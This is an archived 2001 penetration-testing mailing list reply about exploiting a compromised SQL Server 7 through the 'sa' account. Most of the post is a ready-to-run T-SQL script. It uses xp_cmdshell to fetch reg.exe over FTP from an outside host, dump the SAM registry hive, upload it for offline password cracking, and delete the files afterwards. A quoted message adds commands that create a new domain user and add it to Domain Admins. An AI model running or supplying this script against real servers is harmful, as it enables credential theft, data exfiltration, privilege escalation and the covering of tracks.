Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: Attonbitus Deus <Thor () HAMMEROFGOD COM>
Date: Thu, 25 Jan 2001 10:53:57 -0800
Try the FTP command line FROM the box- many firewalls are configured to allow sessions initiated from the inside through. Though a bit cheesy, I use the following script to create line by line filenames, concant them together with a binary copy to make the ftp script, get the REG.EXE program that lets you dump the registry from a server, dump the SAM to a file, create another script that uploads that file, and to then clean up after yourself. I've messed around with DTS and other stuff to create these files, but this is down and dirty and works, so I have not spent that much time figuring out a better way. I got a couple of suggestions on a crack against the syslogins, but haven't tried them yet. I'll post findings on that when I get a chance. Here is the script to get the SAM to crack offline- you can do the same to create any text-based file you want. Declare @var1 sysname, @var2 sysname, @var3 sysname, @var4 sysname Set @var1 = 'echo open ftp.myserver.com > test1.log' Set @var2 = 'echo user username password > test2.log' Set @var3 = 'echo get reg.exe > test3.log' Set @var4 = 'echo quit > test4.log' Exec xp_cmdshell @var1 Exec xp_cmdshell @var2 Exec xp_cmdshell @var3 Exec xp_cmdshell @var4 go Declare @var5 sysname Set @var5 = 'copy test1.log+test2.log+test3.log+test4.log test.log' Exec xp_cmdshell @var5 go Declare @var6 sysname Set @var6 = 'ftp -n -s:test.log' Exec xp_cmdshell @var6 go Declare @var7 sysname Set @var7 = 'del test*.log' Exec xp_cmdshell @var7 go Declare @var7 sysname Set @var7 = 'reg save HKLM\SAM samback' Exec xp_cmdshell @var7 go Declare @var1 sysname, @var2 sysname, @var3 sysname, @var4 sysname Set @var1 = 'echo open ftp.myserver.com > test1.log' Set @var2 = 'echo user username password > test2.log' Set @var3 = 'echo put samback > test3.log' Set @var4 = 'echo quit > test4.log' Exec xp_cmdshell @var1 Exec xp_cmdshell @var2 Exec xp_cmdshell @var3 Exec xp_cmdshell @var4 go Declare @var5 sysname Set @var5 = 'copy test1.log+test2.log+test3.log+test4.log test.log' Exec xp_cmdshell @var5 go Declare @var6 sysname Set @var6 = 'ftp -n -s:test.log' Exec xp_cmdshell @var6 go Declare @var7 sysname Set @var7 = 'del test*.log' Exec xp_cmdshell @var7 go Declare @var7 sysname Set @var7 = 'del samback' Exec xp_cmdshell @var7 go Declare @var7 sysname Set @var7 = 'del reg.exe' Exec xp_cmdshell @var7 go HTH --------------------------------- Attonbitus Deus Thor () HammerofGod Com ----- Original Message ----- From: "FiC" <fic () BIGFOOT COM> To: <PEN-TEST () SECURITYFOCUS COM> Sent: Thursday, January 25, 2001 1:32 AM Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Thank you all for your valuable information. Is there anyway to upload/create a file in the hacked SQL SERVER through the system commands? I think that the machine is behind a Firewall and even if I start the FTP service I can't connect via ftp, and the port 139 is not open or its filtered. I've tried to create an .asp file with the "copy con" command, but I can't do it through the SQL console. How can I upload/create an .asp file to this server? Thanx.
Once you have access to a MSSQL 7 server via the "sa" account, you can do all sorts of fun things: Run system commands: EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN" EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD /DOMAIN" You can also access the registry, send email, dump system information... Take a look at some of the Extended Stored Procedures in the [master] database with SQL Query Analyzer. Depending on the user the server runs
at
(normally SYSTEM or Administrator), you can usually use xp_cmdshell to rebuild the repair disk data with rdisk /s and snag the SAM database. I will be giving a presentation at the upcoming CanSecWest conference covering a variety of SQL server attacks, everything from general
procedure
exploitation to insertion techniques. At the conference, I will be releasing a handful of new tools, one of which exploits the RDS component in new ways, allowing access to SQL servers as well as proxying requests
to
internal systems through it. For more information on the conference, please see http://www.cansecwest.com, online registration should be available within a few weeks.
-- ~/ FiC /~
Current thread:
- [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)